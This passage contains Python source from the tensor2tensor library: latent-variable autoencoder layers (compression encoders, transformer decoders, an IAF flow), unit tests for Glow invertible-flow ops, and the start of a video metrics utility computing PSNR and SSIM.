Tensor of shape [batch, height, width, hparams.hidden_size].
"""
kernel = (hparams.res_kernel_size, hparams.res_kernel_size)
x = inputs
for i in range(hparams.num_res_layers):
with tf.variable_scope("res_conv_%d" % i):
# kernel_size x kernel_size conv block
y = common_layers.conv_block(
common_layers.layer_norm(x, hparams.hidden_size, name="lnorm"),
hparams.hidden_size, [((1, 1), kernel)],
strides=(1, 1),
padding="SAME",
name="residual_conv")
# 1x1 conv block
y = common_layers.conv_block(
y,
hparams.hidden_size, [((1, 1), (1, 1))],
strides=(1, 1),
padding="SAME",
name="residual_dense")
x = common_layers.layer_postprocess(x, y, hparams)
return x
def compress_encoder(inputs,
hparams,
strides=(2, 2),
kernel_size=(3, 3),
name=None):
"""Encoder that compresses 2-D inputs by 2**num_compress_steps.
Args:
inputs: Tensor of shape [batch, height, width, channels].
hparams: tf.contrib.training.HParams.
strides: Tuple, strides for conv block.
kernel_size: Tuple, kernel window size for conv block.
name: string, variable scope.
Returns:
Tensor of shape [batch, latent_length, hparams.hidden_size], where
latent_length is
hparams.num_latents * (height*width) / 2**(hparams.num_compress_steps).
"""
with tf.variable_scope(name, default_name="compress"):
x = inputs
for i in range(hparams.num_compress_steps // 2):
with tf.variable_scope("compress_conv_%d" % i):
y = common_layers.conv_block(
common_layers.layer_norm(
x, hparams.hidden_size, name="lnorm"),
hparams.hidden_size,
dilation_rates_and_kernel_sizes=[((1, 1), kernel_size)],
strides=strides,
padding="SAME",
name="compress_conv_%d" % i)
y = tf.nn.dropout(y, 1.0 - hparams.dropout)
if hparams.do_compress_attend:
y = compress_self_attention_layer(
x, hparams, name="compress_selfatt_%d" % i)
y += x
x = y
x = residual_block_layer(x, hparams)
# If using multiple copies of latents, blow up the hidden size and then
# reshape to increase by num_latents.
shape_x = common_layers.shape_list(x)
x = tf.layers.dense(x,
hparams.num_latents * hparams.hidden_size,
name=name + "_dense")
return tf.reshape(x, [shape_x[0],
shape_x[1] * shape_x[2] * hparams.num_latents,
hparams.hidden_size])
def compress_encoder_2d(x, hparams, name=None):
"""Encoder that compresses 2-D inputs by 2**num_compress_steps.
Args:
x: Tensor of shape [batch, height, width, channels].
hparams: tf.contrib.training.HParams.
name: string, variable scope.
Returns:
Tensor of shape [batch, latent_length, hparams.hidden_size], where
latent_length is
hparams.num_latents * (height*width) / 2**(hparams.num_compress_steps).
"""
return compress_encoder(
x,
hparams,
strides=(2, 2),
kernel_size=(hparams.kernel_size, hparams.kernel_size),
name=name)
def compress_encoder_1d(x, hparams, name=None):
"""Encoder that compresses 1-D inputs by 2**num_compress_steps.
Args:
x: Tensor of shape [batch, length, channels].
hparams: tf.contrib.training.HParams.
name: string, variable scope.
Returns:
Tensor of shape [batch, latent_length, hparams.hidden_size], where
latent_length is
hparams.num_latents * length / 2**hparams.num_compress_steps.
"""
x = tf.expand_dims(x, axis=2)
return compress_encoder(x,
hparams,
strides=(2, 1),
kernel_size=(hparams.kernel_size, 1),
name=name)
def decompress_decoder(inputs,
hparams,
strides=(2, 2),
kernel=(3, 3),
name=None):
"""Decoder that decompresses 2-D inputs by 2**num_compress_steps.
Args:
inputs: Tensor of shape [batch, compress_height, compress_width, channels].
hparams: tf.contrib.training.HParams.
strides: Tuple, strides for conv block.
kernel: Tuple, kernel window size for conv block.
name: string, variable scope.
Returns:
Tensor of shape [batch, height, width, hparams.hidden_size].
"""
with tf.variable_scope(name, default_name="decompress"):
x = inputs
x = tf.layers.dense(x, hparams.hidden_size, name=name + "_dense")
x = residual_block_layer(x, hparams)
for i in range(hparams.num_compress_steps // 2):
j = hparams.num_compress_steps // 2 - i - 1
with tf.variable_scope(name + "_%d" % j):
if hparams.do_decompress_attend:
y = compress_self_attention_layer(
x, hparams, name="decompress_selfatt")
x += y
y = tf.layers.conv2d_transpose(
x,
hparams.hidden_size,
kernel,
strides=strides,
padding="SAME",
activation=tf.nn.relu if i > 0 else None,
name="decompress_conv")
x = y
return x
def decompress_decoder_2d(x, hparams, name=None):
"""Decoder that decompresses 2-D inputs by 2**num_compress_steps.
Args:
x: Tensor of shape [batch, compress_height, compress_width, channels].
hparams: tf.contrib.training.HParams.
name: string, variable scope.
Returns:
Tensor of shape [batch, height, width, hparams.hidden_size].
"""
return decompress_decoder(x, hparams,
strides=(2, 2),
kernel=(hparams.kernel_size, hparams.kernel_size),
name=name)
def decompress_decoder_1d(x, hparams, name=None):
"""Decoder that decompresses 1-D inputs by 2**num_compress_steps.
Args:
x: Tensor of shape [batch, compress_length, channels].
hparams: tf.contrib.training.HParams.
name: string, variable scope.
Returns:
Tensor of shape [batch, length, hparams.hidden_size].
"""
x = tf.expand_dims(x, axis=2)
output = decompress_decoder(x, hparams,
strides=(2, 1),
kernel=(hparams.kernel_size, 1),
name=name)
return tf.squeeze(output, axis=2)
def transformer_text_encoder(inputs,
target_space,
hparams,
name=None):
"""Transformer text encoder over inputs with unmasked full attention.
Args:
inputs: Tensor of shape [batch, length, 1, hparams.hidden_size].
target_space: int. Used for encoding inputs under a target space id.
hparams: tf.contrib.training.HParams.
name: string, variable scope.
Returns:
encoder_output: Tensor of shape [batch, length, hparams.hidden_size].
ed: Tensor of shape [batch, 1, 1, length]. Encoder-decoder attention bias
for any padded tokens.
"""
with tf.variable_scope(name, default_name="transformer_text_encoder"):
inputs = common_layers.flatten4d3d(inputs)
[
encoder_input,
encoder_self_attention_bias,
ed,
] = transformer.transformer_prepare_encoder(inputs,
target_space=target_space,
hparams=hparams)
encoder_input = tf.nn.dropout(encoder_input, 1.0 - hparams.dropout)
encoder_output = transformer.transformer_encoder(
encoder_input, encoder_self_attention_bias, hparams)
return encoder_output, ed
def transformer_image_decoder(targets,
encoder_output,
ed_attention_bias,
hparams,
name=None):
"""Transformer image decoder over targets with local attention.
Args:
targets: Tensor of shape [batch, ...], and whose size is batch * height *
width * hparams.num_channels * hparams.hidden_size.
encoder_output: Tensor of shape [batch, length_kv, hparams.hidden_size].
ed_attention_bias: Tensor which broadcasts with shape [batch,
hparams.num_heads, length_q, length_kv]. Encoder-decoder attention bias.
hparams: tf.contrib.training.HParams.
name: string, variable scope.
Returns:
Tensor of shape [batch, height, width * hparams.num_channels,
hparams.hidden_size].
"""
with tf.variable_scope(name, default_name="transformer_dec"):
batch_size = common_layers.shape_list(targets)[0]
targets = tf.reshape(targets, [batch_size,
hparams.img_len,
hparams.img_len,
hparams.num_channels * hparams.hidden_size])
decoder_input, _, _ = cia.prepare_decoder(targets, hparams)
decoder_output = cia.transformer_decoder_layers(
decoder_input,
encoder_output,
hparams.num_decoder_layers or hparams.num_hidden_layers,
hparams,
attention_type=hparams.dec_attention_type,
encoder_decoder_attention_bias=ed_attention_bias,
name="decoder")
decoder_output = tf.reshape(decoder_output,
[batch_size,
hparams.img_len,
hparams.img_len * hparams.num_channels,
hparams.hidden_size])
return decoder_output
def transformer_latent_decoder(x,
encoder_output,
ed_attention_bias,
hparams,
name=None):
"""Transformer decoder over latents using latent_attention_type.
Args:
x: Tensor of shape [batch, length_q, hparams.hidden_size]. length_q is the
latent length, which is
height * width * hparams.num_latents / (2**hparams.num_compress_steps).
encoder_output: Tensor of shape [batch, length_kv, hparams.hidden_size].
ed_attention_bias: Tensor which broadcasts with shape [batch,
hparams.num_heads, length_q, length_kv]. Encoder-decoder attention bias.
hparams: tf.contrib.training.HParams.
name: string, variable scope.
Returns:
Tensor of shape [batch, length_q, hparams.hidden_size].
"""
with tf.variable_scope(name, default_name="transformer_latent_dec"):
batch_size = common_layers.shape_list(x)[0]
compressed_img_len = (hparams.img_len //
2**(hparams.num_compress_steps // 2))
x = tf.reshape(x, [batch_size,
compressed_img_len,
compressed_img_len * hparams.num_latents,
hparams.hidden_size])
decoder_input, _, _ = cia.prepare_decoder(x, hparams)
decoder_output = cia.transformer_decoder_layers(
decoder_input,
encoder_output,
hparams.num_latent_layers or hparams.num_hidden_layers,
hparams,
attention_type=hparams.latent_attention_type,
encoder_decoder_attention_bias=ed_attention_bias,
name="decoder")
decoder_output = tf.reshape(decoder_output,
[batch_size,
compressed_img_len**2 * hparams.num_latents,
hparams.hidden_size])
return decoder_output
def bottleneck_layer(inputs,
hparams,
name="discrete_bottleneck"):
"""Computes latents given inputs (typically, compressed targets)."""
[
latents_dense,
latents_discrete,
extra_loss,
embed_fn,
_,
] = hparams.bottleneck(inputs=inputs,
filter_size=hparams.compress_filter_size,
name=name,
mode=hparams.mode)
if DO_SUMMARIES:
tf.summary.histogram("discrete_latents",
tf.reshape(latents_discrete, [-1]))
return latents_dense, latents_discrete, extra_loss, embed_fn
def latent_prediction_model(inputs,
ed_attention_bias,
latents_discrete,
latents_dense,
hparams,
vocab_size=None,
name=None):
"""Transformer-based latent prediction model.
It is an autoregressive decoder over latents_discrete given inputs.
Args:
inputs: Tensor of shape [batch, length_kv, hparams.hidden_size]. Inputs to
attend to for the decoder on latents.
ed_attention_bias: Tensor which broadcasts with shape [batch,
hparams.num_heads, length_q, length_kv]. Encoder-decoder attention bias.
latents_discrete: Tensor of shape [batch, length_q, vocab_size].
One-hot latents to compute log-probability of given inputs.
latents_dense: Tensor of shape [batch, length_q, hparams.hidden_size].
length_q is the latent length, which is
height * width * hparams.num_latents / (2**hparams.num_compress_steps).
hparams: tf.contrib.training.HParams.
vocab_size: int or None. If None, it is 2**hparams.bottleneck_bits.
name: string, variable scope.
Returns:
latents_pred: Tensor of shape [batch, length_q, hparams.hidden_size].
latents_pred_loss: Tensor of shape [batch, length_q].
"""
with tf.variable_scope(name, default_name="latent_prediction"):
if hparams.mode != tf.estimator.ModeKeys.PREDICT:
latents_pred = transformer_latent_decoder(tf.stop_gradient(latents_dense),
inputs,
ed_attention_bias,
hparams,
name)
if vocab_size is None:
vocab_size = 2**hparams.bottleneck_bits
if not hparams.soft_em:
# TODO(trandustin): latents_discrete is not one-hot from
# discrete_bottleneck unless hparams.soft_em is True. Refactor.
latents_discrete = tf.one_hot(latents_discrete, depth=vocab_size)
_, latent_pred_loss = ae_latent_softmax(
latents_pred, tf.stop_gradient(latents_discrete), vocab_size, hparams)
return latents_pred, latent_pred_loss
def transformer_autoencoder(inputs,
targets,
target_space,
hparams,
cache=None,
predict_mask=1.0):
"""Auto-encoder using a Transformer decoder and a prior over latent sequences.
Args:
inputs: Tensor of shape [batch, length, 1, hparams.hidden_size] or None.
targets: Tensor of shape [batch, ..., channels]. Ellipses may be 1 or 2
dimensions denoting sequence length.
target_space: int. Used for encoding inputs under a target space id.
hparams: tf.contrib.training.HParams.
cache: Tensor of shape [batch, length] or None.
predict_mask: Tensor masking whether to use gold targets or predictions.
Returns:
decoder_output: Tensor of shape [batch, ..., hparams.hidden_size] presenting
pre-logit activations. After a transformation (`top` in `T2TModel`), it is
used with targets to compute the "training" (reconstruction) loss.
losses: dict of str to Tensors. There are three loss terms: "extra",
"extra_loss", and "latent_pred". The first is hard-coded to 0. The latter
two are Tensors of shape [batch].
cache: Tensor of shape [batch, length], either the same as cache, or newly
computed if the cache input is None.
"""
original_targets_shape = common_layers.shape_list(targets)
batch_size = original_targets_shape[0]
if len(original_targets_shape) == 4:
compress_fn = compress_encoder_2d
decompress_fn = decompress_decoder_2d
else:
compress_fn = compress_encoder_1d
decompress_fn = decompress_decoder_1d
ed_attention_bias = None
if inputs is not None:
inputs, ed_attention_bias = transformer_text_encoder(
inputs, target_space, hparams, name="input_encoder")
losses = {"extra": 0.,
"extra_loss": 0.,
"latent_pred": 0.}
if hparams.mode != tf.estimator.ModeKeys.PREDICT:
targets_compressed = compress_fn(targets, hparams, name="compress")
if hparams.mode == tf.estimator.ModeKeys.TRAIN:
scale = common_layers.inverse_exp_decay(hparams.startup_steps)
else:
scale = 1.0
scale = tf.to_float(tf.less(tf.random_uniform([batch_size]), scale))
latents_dense, latents_discrete, extra_loss, _ = bottleneck_layer(
targets_compressed, hparams)
extra_loss = scale * tf.reduce_mean(extra_loss)
_, latents_pred_loss = latent_prediction_model(
inputs, ed_attention_bias, latents_discrete, latents_dense, hparams,
name="latent_pred")
latent_time = tf.less(hparams.mask_startup_steps,
tf.to_int32(tf.train.get_global_step()))
latents_pred_loss = scale * tf.reduce_mean(latents_pred_loss)
latents_pred_loss *= tf.to_float(latent_time)
# Apply dropout noise for each data point and time step.
latents_dense_shape = common_layers.shape_list(latents_dense)
latents_dense = tf.nn.dropout(
latents_dense,
keep_prob=1 - hparams.latent_dropout,
noise_shape=[latents_dense_shape[0], latents_dense_shape[1], 1])
# TODO(trandustin): Can we combine extra and extra_loss?
losses = {"extra": 0.,
"extra_loss": extra_loss,
"latent_pred": latents_pred_loss}
else:
# Set the latent length, which is num_latents times the number of latent
# pixels. The number of latent pixels is determined by a compression factor
# on the number of image pixels.
latent_len = ((hparams.img_len * hparams.img_len * hparams.num_latents) /
(2**hparams.num_compress_steps))
_, _, _, embed_fn = bottleneck_layer(targets_compressed, hparams)
latents_dense = tf.zeros([batch_size, latent_len, 1, hparams.hidden_size])
if cache is None:
cache = ae_latent_sample_beam(latents_dense,
inputs,
ed_attention_bias,
embed_fn,
hparams)
cache_one_hot = tf.one_hot(cache, depth=2**hparams.bottleneck_bits)
latents_dense = embed_fn(cache_one_hot, hparams.hidden_size)
if len(original_targets_shape) == 4:
compressed_img_len = (hparams.img_len //
2**(hparams.num_compress_steps // 2))
latents_dense = tf.reshape(latents_dense,
[batch_size,
compressed_img_len,
compressed_img_len,
hparams.num_latents * hparams.hidden_size])
latents_dense = decompress_fn(latents_dense, hparams, name="decompress")
latents_dense = tf.reshape(
latents_dense,
[-1, hparams.img_len, hparams.img_len, hparams.hidden_size])
if hparams.use_gold_targets:
if hparams.mode == tf.estimator.ModeKeys.PREDICT:
masking = predict_mask
else:
masking = common_layers.inverse_exp_decay(hparams.mask_startup_steps)
targets, _, _ = cia.maybe_reshape_4d_to_3d(targets)
mask = tf.less(masking,
tf.random_uniform(common_layers.shape_list(targets)[:-1]))
mask = tf.expand_dims(tf.to_float(mask), 2)
latents_dense = mask * targets + (1.0 - mask) * latents_dense
latents_dense = tf.reshape(latents_dense, original_targets_shape)
if hparams.decode_autoregressive:
decoder_output = transformer_image_decoder(
latents_dense, inputs, ed_attention_bias, hparams, name="decoder")
else:
decoder_output = latents_dense
return decoder_output, losses, cache
def iaf_flow(one_hot_assignments,
scale_weights,
scale_bias,
num_codes,
summary=True,
name=None):
"""Performs a single IAF flow using scale and normalization transformations.
Args:
one_hot_assignments: Assignments Tensor with shape [num_samples, batch_size,
latent_size, num_codes].
scale_weights: Tensor corresponding to lower triangular matrix used to
autoregressively generate scale matrix from assignments. To ensure the
lower-triangular matrix has length of latent_size, scale_weights should
be a rank-one tensor with size latent_size * (latent_size + 1) / 2.
scale_bias: Bias tensor to be added to scale tensor, with shape
[latent_size, num_codes]. If scale weights are zero, initialize scale_bias
to be log(exp(1.) / 2. - 1) so initial transformation is identity.
num_codes: Number of codes in codebook.
summary: Whether to save summaries.
name: String used for name scope.
Returns:
flow_output: Transformed one-hot assignments.
inverse_log_det_jacobian: Inverse log deteriminant of Jacobian corresponding
to transformation.
"""
with tf.name_scope(name, default_name="iaf"):
# Pad the one_hot_assignments by zeroing out the first latent dimension and
# shifting the rest down by one (and removing the last dimension).
padded_assignments = tf.pad(
one_hot_assignments, [[0, 0], [0, 0], [1, 0], [0, 0]])[:, :, :-1, :]
scale_bijector = tf.contrib.distributions.bijectors.Affine(
scale_tril=tf.contrib.distributions.fill_triangular(scale_weights))
scale = scale_bijector.forward(
tf.transpose(padded_assignments, [0, 1, 3, 2]))
# Transpose the bijector output since it performs a batch matmul.
scale = tf.transpose(scale, [0, 1, 3, 2])
scale = tf.nn.softplus(scale)
scale = scale + tf.nn.softplus(scale_bias[tf.newaxis, tf.newaxis, ...])
# Don't need last dimension since the transformation keeps it constant.
scale = scale[..., :-1]
z = one_hot_assignments[..., :-1]
unnormalized_probs = tf.concat([z * scale,
one_hot_assignments[..., -1, tf.newaxis]],
axis=-1)
normalizer = tf.reduce_sum(unnormalized_probs, axis=-1)
flow_output = unnormalized_probs / (normalizer[..., tf.newaxis])
inverse_log_det_jacobian = (-tf.reduce_sum(tf.log(scale), axis=-1)
+ num_codes * tf.log(normalizer))
if summary:
tf.summary.histogram("iaf/scale", tf.reshape(scale, [-1]))
tf.summary.histogram("iaf/inverse_log_det_jacobian",
tf.reshape(inverse_log_det_jacobian, [-1]))
return flow_output, inverse_log_det_jacobian
```
#### File: models/research/glow_ops_test.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
import numpy as np
from tensor2tensor.models.research import glow
from tensor2tensor.models.research import glow_ops
import tensorflow as tf
arg_scope = tf.contrib.framework.arg_scope
add_arg_scope = tf.contrib.framework.add_arg_scope
arg_scope = tf.contrib.framework.arg_scope
add_arg_scope = tf.contrib.framework.add_arg_scope
class GlowOpsTest(tf.test.TestCase):
def test_get_variable_ddi(self):
with tf.Graph().as_default():
x_t = tf.random_normal((5, 5))
ddi = glow_ops.get_variable_ddi(
"x", (5, 5), initial_value=x_t, init=True)
with tf.Session() as session:
diff = ddi - x_t
self.assertTrue(np.allclose(session.run(diff), 0.0))
def test_actnorm(self):
"""Test that actnorm provides activations with zero channel-mean."""
with tf.Graph().as_default():
x_t = tf.random_normal((16, 32, 32, 3), mean=50.0, stddev=2.0)
x_act = glow_ops.actnorm("actnorm", x_t, init=True)
with tf.Session() as session:
x_act_np, _ = session.run(x_act)
channel_mean = np.mean(x_act_np, axis=(0, 1, 2))
channel_var = np.var(x_act_np, axis=(0, 1, 2))
self.assertTrue(np.allclose(channel_mean, 0.0, atol=1e-3))
self.assertTrue(np.allclose(channel_var, 1.0, atol=1e-3))
def check_invertibility(self, op, name):
with tf.Graph().as_default():
x = tf.random_uniform(shape=(16, 32, 32, 4))
x_inv, _ = op(name, x, reverse=False)
x_inv_inv, _ = op(name, x_inv, reverse=True)
with tf.Session() as session:
session.run(tf.global_variables_initializer())
diff = session.run(x - x_inv_inv)
self.assertTrue(np.allclose(diff, 0.0, atol=1e-5))
def test_invertibility(self):
rev_ops = [glow_ops.invertible_1x1_conv, glow_ops.affine_coupling,
glow_ops.actnorm]
names = ["inv_1X1_conv", "affine_coupling", "actnorm"]
for rev_op, name in zip(rev_ops, names):
self.check_invertibility(rev_op, name)
def test_add_edge_bias(self):
with tf.Graph().as_default():
x = tf.random_uniform(shape=(16, 32, 32, 3))
x_pad = glow_ops.add_edge_bias(x, [3, 3])
with tf.Session() as session:
x_pad_np = session.run(x_pad)
# Test expected output shape.
self.assertEqual(x_pad_np.shape, (16, 34, 34, 4))
def test_conv2d(self):
with tf.Graph().as_default():
x = 10.0 * tf.random_uniform(shape=(16, 5, 5, 32))
with arg_scope([glow_ops.actnorm], init=True):
actnorm_conv2d = glow_ops.conv2d(
"actnorm_conv2d", x, output_channels=64, apply_actnorm=True)
actnorm_zeros2d = glow_ops.conv2d(
"actnorm_zeros2d", x, output_channels=64, apply_actnorm=False)
with tf.Session() as session:
session.run(tf.global_variables_initializer())
# test if apply_actnorm is set to True, the first minibatch has
# zero mean and unit variance.
actnorm_np, zeros_np = session.run([actnorm_conv2d, actnorm_zeros2d])
self.assertEqual(actnorm_np.shape, (16, 5, 5, 64))
mean = np.mean(actnorm_np, axis=(0, 1, 2))
var = np.var(actnorm_np, axis=(0, 1, 2))
self.assertTrue(np.allclose(mean, 0.0, atol=1e-5))
self.assertTrue(np.allclose(var, 1.0, atol=1e-5))
# test shape in case apply_actnorm is set to False,
self.assertEqual(zeros_np.shape, (16, 5, 5, 64))
def test_affine_coupling_network(self):
"""Test output shape."""
with tf.Graph().as_default():
x = 10.0 * tf.random_uniform(shape=(16, 5, 5, 32))
nn = glow_ops.affine_coupling_network("nn", x, 512, 64)
with tf.Session() as session:
session.run(tf.global_variables_initializer())
nn_np = session.run(nn)
self.assertEqual(nn_np.shape, (16, 5, 5, 64))
# Initialized with zeros.
self.assertTrue(np.allclose(nn_np, 0.0))
def check_tensor_to_dist(self, architecture):
with tf.Graph().as_default():
x = tf.random_uniform(shape=(16, 5, 5, 32))
x_prior = glow_ops.tensor_to_dist("split_prior", x,
architecture=architecture,
output_channels=64)
mean_t, scale_t = x_prior.loc, x_prior.scale
with tf.Session() as session:
session.run(tf.global_variables_initializer())
mean, scale = session.run([mean_t, scale_t])
self.assertEqual(mean.shape, (16, 5, 5, 64))
self.assertEqual(scale.shape, (16, 5, 5, 64))
self.assertTrue(np.allclose(mean, 0.0))
self.assertTrue(np.allclose(scale, 1.0))
def test_tensor_to_dist(self):
for architecture in ["single_conv", "glow_nn"]:
self.check_tensor_to_dist(architecture)
def test_split(self):
with tf.Graph().as_default():
x = tf.random_uniform(shape=(16, 5, 5, 32))
x_inv, _, eps, z, _ = glow_ops.split("split", x)
x_inv_inv, _, _ = glow_ops.split("split", x_inv, reverse=True, eps=eps)
with tf.Session() as session:
session.run(tf.global_variables_initializer())
x_inv_np, diff, z_np = session.run([x_inv, x - x_inv_inv, z])
self.assertEqual(z_np.shape, (16, 5, 5, 16))
self.assertEqual(x_inv_np.shape, (16, 5, 5, 16))
self.assertTrue(np.allclose(diff, 0.0, atol=1e-5))
def check_revnet_reversibility(self, op, name):
with tf.Graph().as_default():
hparams = glow.glow_hparams()
hparams.depth = 2
x = tf.random_uniform(shape=(16, 32, 32, 4), seed=0)
x_inv, _ = op(name, x, hparams, reverse=False)
x_inv_inv, _ = op(name, x_inv, hparams, reverse=True)
with tf.Session() as session:
session.run(tf.global_variables_initializer())
diff = session.run(x - x_inv_inv)
self.assertTrue(np.allclose(diff, 0.0, atol=1e-2))
def test_revnet_reversibility(self):
ops = [glow_ops.revnet_step, glow_ops.revnet]
names = ["revnet_step", "revnet"]
for op, name in zip(ops, names):
self.check_revnet_reversibility(op, name)
def test_encoder_decoder(self):
with tf.Graph().as_default():
hparams = glow.glow_hparams()
hparams.n_levels = 3
hparams.depth = 2
x = tf.random_uniform(shape=(16, 64, 64, 4), seed=0)
x_inv, _, eps, z_levels, _ = glow_ops.encoder_decoder(
"encoder_decoder", x, hparams, reverse=False)
x_inv_inv, _, z_inv_levels, _ = glow_ops.encoder_decoder(
"encoder_decoder", x_inv, hparams, eps=eps, reverse=True)
with tf.Session() as session:
session.run(tf.global_variables_initializer())
diff, x_inv_np, z_levels_np, z_inv_levels_np = session.run(
[x - x_inv_inv, x_inv, z_levels, z_inv_levels])
self.assertEqual(len(z_levels_np), 2)
self.assertEqual(len(z_inv_levels_np), 2)
# (h_i, w_i, c_i) = (h_{i-1}/f, w_{i-1}/f, c_{i-1}*(2f)/2) where (f=2)
self.assertEqual(z_levels_np[0].shape, (16, 32, 32, 8))
self.assertEqual(z_levels_np[1].shape, (16, 16, 16, 16))
self.assertEqual(z_inv_levels_np[0].shape, (16, 32, 32, 8))
self.assertEqual(z_inv_levels_np[1].shape, (16, 16, 16, 16))
self.assertTrue(x_inv_np.shape, (16, 8, 8, 64))
self.assertTrue(np.allclose(diff, 0.0, atol=1e-2))
def test_encoder_decoder_practical_usage(self):
"""Tests the following sequence of operations.
1. Define forward network with arg_scope(init=True).
2. Run one-forward pass to do data-dependent initialization and save.
3. Define forward and reverse network with arg_scope(init=False)
4. Check that reverse(forward(x)) == x
"""
hparams = glow.glow_hparams()
hparams.n_levels = 2
hparams.depth = 12
with tf.Graph().as_default():
rng = np.random.RandomState(0)
x_rand = np.asarray(rng.rand(1, 4, 4, 4), dtype=np.float32)
x_t = tf.convert_to_tensor(x_rand)
ops = [glow_ops.get_variable_ddi, glow_ops.actnorm]
with arg_scope(ops, init=True):
x_inv, _, _, _, _ = glow_ops.encoder_decoder(
"revnet", x_t, hparams, reverse=False)
curr_dir = tempfile.mkdtemp()
model_path = os.path.join(curr_dir, "model")
with tf.Session() as session:
saver = tf.train.Saver()
session.run(tf.global_variables_initializer())
session.run(x_inv)
saver.save(session, model_path)
with tf.Graph().as_default():
rng = np.random.RandomState(0)
x_rand = np.asarray(rng.rand(1, 4, 4, 4), dtype=np.float32)
x_t = tf.convert_to_tensor(x_rand)
ops = [glow_ops.get_variable_ddi, glow_ops.actnorm]
with arg_scope(ops, init=False):
x_inv2, _, all_eps, _, _ = glow_ops.encoder_decoder(
"revnet", x_t, hparams, reverse=False)
x_inv_inv_, _, _, _ = glow_ops.encoder_decoder(
"revnet", x_inv2, hparams, eps=all_eps, reverse=True)
with tf.Session() as session:
saver = tf.train.Saver()
saver.restore(session, model_path)
x_inv_inv_np = session.run(x_inv_inv_)
diff = np.abs(x_inv_inv_np - x_rand)
self.assertTrue(np.allclose(diff, 0.0, atol=1e-3))
def test_scale_gaussian_prior(self):
with tf.Graph().as_default():
rng = np.random.RandomState(0)
img_shape = (16, 2, 2, 2)
x_rand = np.asarray(rng.randint(0, 10, img_shape), dtype=np.float32)
z_rand = np.asarray(rng.randint(0, 10, img_shape), dtype=np.float32)
x_t = tf.convert_to_tensor(x_rand)
z_t = tf.convert_to_tensor(z_rand)
dist = glow_ops.scale_gaussian_prior(
"scale_gaussian_prior", z_t, x_t, trainable=True)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
mean, scale = sess.run([dist.loc, dist.scale])
self.assertTrue(np.allclose(mean, z_rand))
self.assertTrue(np.allclose(scale, 1.0))
def check_split_latent_conditioning(self, merge_std):
with tf.Graph().as_default():
rng = np.random.RandomState(0)
x_rand = rng.randn(12, 32, 32, 32).astype(np.float32)
latent_rand = rng.randn(12, 32, 32, 16).astype(np.float32)
x_t = tf.convert_to_tensor(x_rand)
latent_t = tf.convert_to_tensor(latent_rand)
hparams = glow.glow_hparams()
hparams.level_scale = merge_std
hparams.add_hparam("latent_dist_encoder", "pointwise")
# Test initalization.
# x2 ~ N(scale * latent, 1.0) where initial scale is 1.0
exp_x2 = x_rand[:, :, :, 16:]
exp_eps = x_rand[:, :, :, 16:] - latent_rand
x_inv, _, eps, x2_t, _ = glow_ops.split(
merge_std, x_t, cond_latents=latent_t, hparams=hparams)
# Test reversibility.
x_inv_inv, _, _ = glow_ops.split(
merge_std, x_inv, cond_latents=latent_t, eps=eps, reverse=True,
hparams=hparams)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
actual_eps, actual_x2, diff_np = sess.run([eps, x2_t, x_inv_inv - x_t])
self.assertTrue(np.allclose(diff_np, 0.0, atol=1e-5))
self.assertTrue(np.allclose(actual_eps, exp_eps))
self.assertTrue(np.allclose(exp_x2, actual_x2))
def test_split_latent_conditioning(self):
for merge_std in ["normal", "prev_level", "prev_step"]:
self.check_split_latent_conditioning(merge_std)
def test_latent_dist_encoder_lstm(self):
with tf.Graph().as_default():
rng = np.random.RandomState(0)
# Initialize x, latent, state.
x_rand = rng.randn(12, 32, 32, 16).astype(np.float32)
latent_rand = rng.randn(12, 32, 32, 16).astype(np.float32)
state_rand = rng.randn(12, 32, 32, 16).astype(np.float32)
x_t = tf.convert_to_tensor(x_rand)
latent_t = tf.convert_to_tensor(latent_rand)
state_t = tf.convert_to_tensor(state_rand)
init_state = tf.contrib.rnn.LSTMStateTuple(state_t, state_t)
hparams = glow.glow_hparams()
hparams.add_hparam("latent_dist_encoder", "conv_lstm")
hparams.add_hparam("latent_skip", True)
prior_dist, new_state = glow_ops.compute_prior(
"lstm_prior", x_t, latent=latent_t, hparams=hparams, state=init_state)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
# Test initialization (mu, sigma) = (z, 1.0)
ops = [prior_dist.loc, prior_dist.scale, new_state.h - init_state.h]
mean, scale, diff_np = sess.run(ops)
self.assertTrue(np.allclose(latent_rand - mean, 0.0))
self.assertTrue(np.allclose(scale, 1.0))
# State update.
self.assertFalse(np.allclose(diff_np, 0.0))
if __name__ == "__main__":
tf.test.main()
```
#### File: tensor2tensor/utils/video_metrics.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import numpy as np
import six
import tensorflow as tf
def load_image_map_function(filename, frame_shape):
image = tf.read_file(filename)
image = tf.image.decode_png(image)
image = tf.image.resize_images(image, frame_shape[0:2])
image.set_shape(frame_shape)
return image
def load_videos(template, video_length, frame_shape):
"""Loads videos from files.
Args:
template: template string for listing the image files.
video_length: length of the video.
frame_shape: shape of each frame.
Returns:
dataset: the tf dataset frame by frame.
dataset_len: number of the items which is the number of image files.
Raises:
ValueError: if no files found.
"""
filenames = tf.gfile.Glob(template)
if not filenames:
raise ValueError("no files found.")
filenames = sorted(filenames)
dataset_len = len(filenames)
filenames = tf.constant(filenames)
dataset = tf.data.Dataset.from_tensor_slices(filenames)
dataset = dataset.apply(tf.contrib.data.map_and_batch(
lambda filename: load_image_map_function(filename, frame_shape),
video_length, drop_remainder=True))
return dataset, dataset_len
def file_pattern(output_dir, problem_name, prefix):
return os.path.join(output_dir, "{}_{}*.png".format(problem_name, prefix))
def get_target_and_output_filepatterns(output_dir, problem_name):
return (file_pattern(output_dir, problem_name, "outputs"),
file_pattern(output_dir, problem_name, "targets"))
def get_zipped_dataset_from_png_files(
output_files, target_files, video_length, frame_shape):
outputs, len_ = load_videos(output_files, video_length, frame_shape)
targets, len_ = load_videos(target_files, video_length, frame_shape)
zipped_dataset = tf.data.Dataset.zip((outputs, targets))
num_videos = len_ // video_length
iterator = zipped_dataset.make_one_shot_iterator()
return iterator, None, num_videos
def save_results(results, output_dir, problem_name):
for name, array in six.iteritems(results):
output_filename = "{}_{}.npy".format(problem_name, name)
output_filename = os.path.join(output_dir, output_filename)
with tf.gfile.Open(output_filename, "wb") as fname:
np.save(fname, array)
def psnr_and_ssim(output, target):
"""Compute the PSNR and SSIM.
Args:
output: 4-D Tensor, shape=(num_frames, height, width, num_channels)
target: 4-D Tensor, shape=(num_frames, height, width, num_channels)
Returns:
psnr: 1-D Tensor, shape=(num_frames,)
